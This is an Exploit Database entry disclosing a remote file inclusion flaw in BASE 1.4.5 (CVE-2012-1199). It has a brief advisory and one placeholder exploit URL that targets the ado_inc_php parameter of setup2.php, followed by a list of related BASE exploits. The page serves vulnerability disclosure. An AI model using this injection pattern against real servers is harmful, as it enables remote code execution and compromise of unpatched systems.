Exploit Database - Logo

Basic Analysis and Security Engine (BASE) 1.4.5 - '/setup/setup2.php?ado_inc_PHP' Remote File Inclusion

EDB-ID: 36723 Author: indoushka Published: 2012-02-11
CVE: CVE-2012-1199 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: Link Tags: N/A
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/51979/info
                     
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
                     
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
                     
BASE 1.4.5 is vulnerable; other versions may be affected.

Exploit: http://www.example.com/base/setup/setup2.php?ado_inc_php=[EV!L]

Related Exploits

Trying to match CVEs (1): CVE-2012-1199
Trying to match OSVDBs (1): 79513
Other Possible E-DB Search Terms: Basic Analysis and Security Engine (BASE) 1.4.5,  Basic Analysis and Security Engine
Date D V Title Author
2009-05-23Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.2.4 - 'readRoleCookie()' Authentication BypassTim Medin
2005-10-25Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.2 - 'Base_qry_main.php' SQL InjectionRemco Verhoef
2003-04-06Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.2.4 - PrintFreshPage Cross-Site ScriptingAdam Ely
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - '/admin/base_useradmin.php?base_path' Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - '/admin/index.php?base_path' Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - '/help/base_setup_help.php?base_path' Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_action.inc.php?base_path' Remote File Inc...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_cache.inc.php?base_path' Remote File Incl...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_db.inc.php?base_path' Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_include.inc.php?base_path' Remote File In...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_output_html.inc.php?base_path' Remote Fil...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_output_query.inc.php?base_path' Remote Fi...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_common.inc.php?GLOBALS[user_session...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_criteria.inc.php?base_path' Remote ...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_query.inc.php?base_path' Remote Fil...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - '/setup/base_conf_contents.php' Multiple Remote File Incl...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_ag_main.php' Crafted Arbitrary File Upload / Arbitr...indoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_ag_main.php?base_path' Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_db_setup.php?base_path' Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_common.php?base_path' Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_display.php?base_path' Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_form.php?base_path' Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_main.php?base_path' Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_local_rules.php?base_path' Remote File Inclusionindoushka
2012-02-11Download Exploit Code Verified Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_logout.php?base_path' Remote File Inclusionindoushka
Menu